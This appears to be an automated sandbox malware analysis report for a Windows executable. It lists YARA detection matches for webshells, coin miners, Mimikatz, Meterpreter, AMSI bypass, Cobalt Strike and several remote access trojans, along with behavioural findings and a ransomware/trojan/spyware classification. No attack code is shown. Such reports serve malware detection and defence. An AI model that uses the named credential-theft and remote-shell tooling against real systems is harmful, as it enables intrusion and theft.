Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18308889341.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HackTool_Samples description = Hacktool, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: IronPanda_Malware_Htran date = 2015-09-16, author = Florian Roth, description = Iron Panda Malware Htran, reference = https://goo.gl/E4qia9, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p Jump to behavior
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64 Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: String function: 00401352 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: String function: 00007FF7E3050D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: String function: 00007FF7E3050DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: String function: 00007FF7E30ABAAC appears 36 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C4C7D NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA, 6_2_022C4C7D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BDB60 NtAllocateVirtualMemory, 6_2_022BDB60
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BCF55 NtWriteVirtualMemory,LoadLibraryA, 6_2_022BCF55
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C45A3 NtProtectVirtualMemory, 6_2_022C45A3
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C0C06 NtWriteVirtualMemory,LoadLibraryA, 6_2_022C0C06
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C010B NtWriteVirtualMemory, 6_2_022C010B
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C25FC NtWriteVirtualMemory, 6_2_022C25FC
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B07F5 NtWriteVirtualMemory, 6_2_022B07F5
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BD1D3 NtWriteVirtualMemory,LoadLibraryA, 6_2_022BD1D3
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305C444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle, 18_2_00007FF7E305C444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3065B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile, 18_2_00007FF7E3065B80
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3059FF0 NtSetInformationFile, 18_2_00007FF7E3059FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3065DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError, 18_2_00007FF7E3065DB4
PE file contains executable resources (Code or Archives)
Source: MpAsDesc.dll.mui18.17.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: mpuxagent.dll.mui20.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.17.dr Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.10.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui43.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.17.dr Static PE information: No import functions for PE file found
Source: mpavbase.vdm.11.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.17.dr Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.10.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: mpasbase.vdm.11.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.17.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 1gPmnCR2PX.exe, 00000006.00000000.18137281855.0000000000426000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBLRESLERS.exe vs 1gPmnCR2PX.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18690335767.0000000002BB0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameBLRESLERS.exeFE2XAssoleanerAssoElectrum vs 1gPmnCR2PX.exe
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security Jump to behavior
Yara detected Winexe tool
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Source: mpasdlta.vdm.10.dr Static PE information: Section: .rsrc ZLIB complexity 0.998618847943
Source: mpavdlta.vdm.10.dr Static PE information: Section: .rsrc ZLIB complexity 0.996141098485
Source: 1gPmnCR2PX.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.mine.winEXE@13/304@2/3
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304B0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 18_2_00007FF7E304B0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3061AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError, 18_2_00007FF7E3061AE0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: sload.vbp
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
